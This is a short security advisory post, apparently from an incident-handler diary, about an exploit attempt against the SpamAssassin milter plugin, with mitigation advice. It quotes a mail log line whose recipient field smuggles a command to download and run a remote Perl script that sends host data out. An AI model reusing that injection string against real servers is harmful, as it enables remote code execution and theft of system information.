Last Updated: 2011-01-30 04:34:25 UTC
by Adrien de Beaupre (Version: 2)
Observant reader Roy caught an interesting exploit attempt against his SMTP server. His review of the logs turned up this:
Messages rejected to recipient: root+:|wget
hxxp://www.linux-echo.de/.x/p.txt;perl p.txt: smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<firstname.lastname@example.org> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)
Handler Bojan notes that it appears that the bad guys have started to actively exploit SpamAssassin's milter vulnerability that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).
The perl script collects some information about the local host and tries to send it to 184.108.40.206 on port 80 -- this host appears to be unreachable at the moment though.
Update: SecurityFocus BID 38578
Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136
Alternatively, don't use the -x option when running this plugin, as well do not run it as root.
Adrien de Beaupré